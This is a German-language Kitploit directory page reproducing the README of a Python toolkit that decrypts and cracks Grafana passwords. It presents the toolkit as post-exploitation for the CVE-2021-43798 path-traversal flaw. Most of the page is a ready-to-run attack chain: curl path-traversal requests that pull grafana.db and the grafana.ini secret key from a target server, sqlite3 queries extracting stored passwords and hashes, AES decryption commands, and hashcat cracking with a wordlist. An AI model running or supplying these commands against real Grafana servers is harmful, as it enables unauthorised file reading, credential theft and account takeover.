Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Grafana-Password-Decryptor — Python-Toolkit zum Entschlüsseln von AES-256 und Knacken von PBKDF2-Passwörtern aus Grafana-Datenbanken, die normalerweise mit (CVE-2021-43798) gepaart werden | Kitploit
Tools/GitHubGitHub/strikoder-premium/grafana-password-decryptor
Passwort-CrackingVerschlüsselungs-/EntschlüsselungstoolsSchwachstellenanalyseExploitationPost-ExploitationKryptographie
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

Python-Toolkit zum Entschlüsseln von AES-256 und Knacken von PBKDF2-Passwörtern aus Grafana-Datenbanken, die normalerweise mit (CVE-2021-43798) gepaart werden

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Grafana-Passwort-Entschlüsseler

Python-Toolkit zum Entschlüsseln und Knacken von Grafana-Passwörtern aus mehreren Formaten.

Programmiert von: strikoder

Was macht dieses Tool?

Behandelt zwei Arten der Grafana-Passwortspeicherung:

  • 🔐 AES-256 Base64 (data_source-Tabelle) → Direkt mit AESDecrypt.py entschlüsseln
  • 🔨 PBKDF2_HMAC_SHA256 (user-Tabelle) → Für Hashcat mit grafana2hashcat.py konvertieren

Perfekt für die Post-Exploitation nach CVE-2021-43798 Path Traversal.

Was ist CVE-2021-43798?

Eine Path-Traversal-Schwachstelle in Grafana-Versionen 8.0.0-beta1 bis 8.3.0, die es nicht authentifizierten Angreifern ermöglicht, beliebige Dateien vom Server zu lesen, einschließlich:

  • Konfigurationsdateien (/etc/grafana/grafana.ini)
  • Datenbankdateien (/var/lib/grafana/grafana.db)
  • Systemdateien (/etc/passwd)

Beispiel-Exploit:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

Dieses Toolkit vervollständigt die Angriffskette, indem es die aus der Datenbank extrahierten Passwörter entschlüsselt/knackt.

Enthaltene Tools

1. AESDecrypt.py

Entschlüsselt AES-256-verschlüsselte Passwörter aus der data_source-Tabelle.

Basiert auf: jas502n/Grafana-CVE-2021-43798 mit wichtigen Verbesserungen:

  • ✅ Flexibler Geheimer Schlüssel: Schlüssel manuell extrahieren (keine fest codierten Pfade)
  • ✅ Stapelverarbeitung: Mehrere Hashes aus einer Datei entschlüsseln
  • ✅ Voll konfigurierbar: Alle Parameter über CLI-Flags

2. grafana2hashcat.py

Konvertiert Grafana PBKDF2_HMAC_SHA256-Hashes aus der user-Tabelle in ein Hashcat-kompatibles Format zum Knacken von Passwörtern.

Dank an: iamaldi/grafana2hashcat

Installation

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

Verwendung

Tool 1: AESDecrypt.py (für AES-256 Base64-Passwörter)

Einzelnen Hash entschlüsseln

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Mehrere Hashes entschlüsseln

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

Benutzerdefinierten geheimen Schlüssel verwenden

Extrahiere den geheimen Schlüssel aus der Grafana-Konfiguration:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

Tool 2: grafana2hashcat.py (für PBKDF2-Hashes)

Einzelne Hash-Datei konvertieren

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

Eingabeformat (grafana_hashes.txt):

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

Ausgabe (bereit für Hashcat):

root@kitploit:~
sha256:10000:base64_salt:base64_hash

In Datei speichern

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

Mit Hashcat knacken

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

Vollständiges Exploit-Beispiel

Szenario 1: AES-verschlüsselte Passwörter (data_source-Tabelle)

root@kitploit:~
# 1. Extract secret key from grafana.ini (might be empty in some cases, use default key in python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

Szenario 2: PBKDF2-Hashes (user-Tabelle)

root@kitploit:~
# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

Kurzreferenz: Welches Tool verwenden?

Danksagungen

  • AESDecrypt.py: Programmiert von strikoder, basierend auf jas502ns Go-Implementierung
  • grafana2hashcat.py: Erstellt von iamaldi

⭐ Nützlich gefunden? Gib einen Stern!

Programmiert von strikoder

Tool herunterladen
Passwort-TypDatenbank-TabelleFormatWerkzeugHashcat-Modus
AES-256 verschlüsseltdata_sourceBase64-StringAESDecrypt.pyN/A (direkte Entschlüsselung)
PBKDF2_HMAC_SHA256userHex-Hash + Saltgrafana2hashcat.py-m 10900